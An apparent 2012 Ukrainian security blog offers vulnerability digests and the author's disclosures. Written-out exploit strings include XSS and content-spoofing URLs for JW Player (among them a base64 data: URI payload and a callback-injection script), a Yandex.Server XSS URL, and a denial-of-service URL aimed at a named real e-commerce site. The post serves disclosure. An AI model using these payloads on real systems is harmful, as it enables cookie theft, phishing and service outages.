Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Uploadify, All-in-One Event Calendar та WPsc-MijnPress. Для котрих з’явилися експлоіти. Uploadify - це плагін для надання можливості завантажувати файли на сайт, All-in-One Event Calendar - це плагін для створення календаря, WPsc-MijnPress - це фреймворк для розробників.

• Reflected XSS in Uploadify Integration Wordpress plugin (деталі)
• Multiple XSS vulnerabilities in All-in-One Event Calendar Plugin for WordPress (деталі)
• Wordpress WPsc-MijnPress plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Polycom Web Management Interface O.S. Command Injection (деталі)
• CitrusDB 2.4.1 - LFI/SQLi Vulnerability (деталі)
• Multiple Vulnerabilities in OpenCart 1.5.2.1 (деталі)
• Apache Hadoop user impersonation vulnerability (деталі)
• PHPNuke Module’s Name Download SQL Injection Vulnerabilities (деталі)
• Path Traversal on Polycom Web Management Interface (деталі)
• Matterdaddy Market v1.1 - SQL Injection Vulnerabilities (деталі)
• GroupWare epesiBIM CRM 1.2.1 - Multiple Web Vulnerabilities (деталі)
• online newspaper university “newsdesc.php” SQL Injection Vulnerabilities (деталі)
• Local File Inclusion in Invision Power Board 3.3.0 (деталі)

28.05.2012

У травні, 25.05.2012, під час пентесту, я виявив Content Spoofing та Cross-Site Scripting уразливості в JW Player. Про деякі з цих CS уразливостей мені відомо ще з 2008 року, коли вперше зіштовхнувся з цим відеоплеєром на флеші. Про що найближчим часом повідомлю розробникам флеш додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

06.06.2012

Content Spoofing:

В параметрі file можна вказати як відео, так і аудіо файли.

Можна вказувати абсолютні URL (в параметрах file та image) для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/jwplayer.swf?file=1.flv&image=1.jpg

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL (в параметрі config) для включення зовнішніх файлів в флешку на цільовому сайті (параметри file та image в xml-файлі приймають довільні адреси). Для завантаження файла конфігурації з зовнішнього сайта він повинен мати crossdomain.xml.

http://site/jwplayer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL (в параметрі playlistfile) для включення зовнішніх файлів в флешку на цільовому сайті (параметри media:content та media:thumbnail в xml-файлі приймають довільні адреси). Для завантаження файла плейліста з зовнішнього сайта він повинен мати crossdomain.xml.

http://site/jwplayer.swf?playlistfile=1.rss
http://site/jwplayer.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>

XSS:

http://site/jwplayer.swf?playerready=alert(document.cookie)

XSS:

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

В ліцензійних версіях плеєра є така функція, як логотип. Тому в ліцензійних версіях swf-файла також є наступні уразливості.

Content Spoofing:

http://site/jwplayer.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua

XSS:

http://site/jwplayer.swf?file=1.flv&logo.file=1.jpg&logo.link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі JW Player 5.9.2156 та попередні версії. А також всі веб додатки, що використовують дані версії JW Player, а це сотні веб додатків та мільйони сайтів в Інтернеті. Перша з наведених XSS уразливостей вже виправлена в версії 5.9.2206 (інші уразливості розробники планують виправити в наступній 6.0 версії). Лише деякі з цих уразливостей наявні в 3.x та попередніх версіях.

Swf-файли JW Player можуть мати різні імена, такі як jwplayer.swf та player.swf. За інформацією Google, існує близько 7709600 таких flash файлів в Інтернеті.

P.S.

Виправив код XSS в ліцензійний версії плеєра. Замість javascript: URI потрібно використовувати data: URI (перший варіант спрацьовував лише в старих версіях плеєра).

В даній добірці уразливості в веб додатках:

• Barracuda CudaTel v2.0.029.1 - Multiple Web Vulnerabilities (деталі)
• XSS and Blind SQL Injection Vulnerabilities in ExponentCMS (деталі)
• Chengdu Bureau of Commerce - SQL Injection Vulnerability (деталі)
• Havalite CMS v1.0.4 - Multiple Web Vulnerabilities (деталі)
• IPhone TreasonSMS - HTML Inject & File Include Vulnerability (деталі)
• VMware vCenter Chargeback Manager Information Leak and Denial of Service (деталі)
• phpMyBible 0.5.1 Mutiple XSS (деталі)
• typo3-src security update (деталі)
• idev Game Site CMS v1.0 - Multiple Web Vulnerabilites (деталі)
• osCmax Shop CMS v2.5.1 - Multiple Web Vulnerabilities (деталі)

Торік я писав про знайдену мною уразливість Certificate Spoofing в Google Chrome для Android. А нещодавно я навів відео-ролик з подібною уразливістю - в ньому демонструється експлоіт для SSL Spoofing в Mozilla Firefox. У відео не зазначалося, яка саме версія є вразливою, тому я провів власні дослідження в різних браузерах.

Сьогодні я виявив, що дана SSL Spoofing уразливість наявна не тільки в Firefox, але і в Internet Explorer. Дана уразливість дозволяє підробити URL в адресному рядку браузера і отримати SSL сертифікат від іншого сайта (точніше сказати, вона дозволяє для одного сайта підставити адресу іншого сайта в адресний рядок і в його SSL сертифікат), що може бути використано для проведення фішинг атак. Для перевірки я розробив експлоіт аналогічний показаному в відео-ролику.

Уразливі Mozilla Firefox 3.0.19 та Internet Explorer 6 (6.0.2900.2180).

При цьому Firefox 3.6.8, 4.0 beta 2 і вище невразливі, так само як Google Chrome і Opera. В IE7 та IE8 код не працює із-за несумісності (в цих версіях дощо змінена підтримка JS), але якщо зробити код під ці версії Internet Explorer, то експлоіт цілком може запрацювати.

В даній добірці уразливості в веб додатках:

• CheckPoint Firewall VPN - Information Disclosure (деталі)
• Landshop v0.9.2 - Multiple Web Vulnerabilities (деталі)
• ME Firewall Analyzer v7.2 - Cross Site Vulnerabilities (деталі)
• Flatnux CMS 2011 08.09.2 - Multiple Web Vulnerabilities (деталі)
• DirectAdmin v1.403 - Cross Site Scripting Vulnerability (деталі)
• Multiple Vulnerabilities in Uploadify 2.1.4 (деталі)
• File Existence Disclosure in Uploadify 3.0.0 (деталі)
• vBulletin 4.1.10 Sql Injection Vulnerabilitiy (деталі)
• 0day; Open Proxy vulnerability in Umbraco 4.7 (деталі)
• Enterasys SecureStack Switch v6.x - Multiple Persistent XSS Vulnerabilities (деталі)

05.02.2012

У грудні, 01.12.2011, я знайшов Denial of Service уразливість на відомому сайті http://plimus.com. Про що найближчим часом сповіщу адміністрацію сайта.

Plimus - це популярна е-комерс система, що дозволяє продавати та купувати товари і послуги через свій сайт. І його власники заявляють про відповідність PCI DSS, при цьому маючи уразливості на сайті. Стосовно дірок на сайтах онлайн магазинів та електронних платіжних систем в останнє я писав про уразливості на www.allmoney.com.ua.

Детальна інформація про уразливість з’явиться пізніше.

30.05.2012

DoS:

https://secure.plimus.com/servlet/humanity.jpg?imageWidth=10000&imageHeight=10000

Використовуючи великі значення в параметрі imageWidth, imageHeight або в обох параметрах можна спожити всю пам’ять сервера. Про аналогічні DoS уразливості в багатьох веб додатках, в тому числі в Megapolis.Portal Manager, що використовується на багатьох українських державних сайтах та сайтах спецслужб, я вже писав раніше.

Дана уразливість досі не виправлена. Що несерйозно для відомого е-комерс сайта.

У травні, 18.05.2012, під час пентесту, я виявив нову Cross-Site Scripting уразливість в Yandex.Server (Яндекс.Сервер). Причому в версії Яндекс.Сервер Enterprise, але Free Edition також повинна бути уразливою.

Раніше я вже писав про уразливості в пошуці Яndex.Server.

XSS:

http://site/search/?text=%27);alert(document.cookie)//

Уразливі Yandex.Server 2010 9.0 Enterprise та попередні версії.

В даній добірці уразливості в веб додатках:

• Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability (деталі)
• Tufin SecureTrack Cross Site Script (деталі)
• Hotel Booking Portal SQL Injection (деталі)
• phpPaleo Local File Inclusion (деталі)
• e-ticketing SQL Injection (деталі)
• Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module (деталі)
• Multiple vulnerabilities in osCmax (деталі)
• Astaro Command Center v2.x - Multiple Web Vulnerabilities (деталі)
• Vulnerabilities in phpMyAdmin (деталі)
• typo3-src security update (деталі)

В даній добірці уразливості в веб додатках:

• Multiple permanent XSS vulnerabilities in EMC Documentum eRoom (деталі)
• Prado TJavaScript::encode() script injection vulnerability (деталі)
• PHP Grade Book Unauthenticated SQL Database Export (деталі)
• phpMoneyBooks Local File Inclusion (деталі)
• Matthew1471s ASP BlogX - XSS Vulnerabilities (деталі)
• EMC Documentum eRoom Multiple Vulnerabilities (деталі)
• Multiple Vulnerabilities in NextBBS 0.6.0 (деталі)
• Cross-site scripting vulnerability in Invision Power Board version 3.2.3 (деталі)
• tryton-server security update (деталі)
• Multiple Vulnerabilities in Coppermine 1.5.18 (деталі)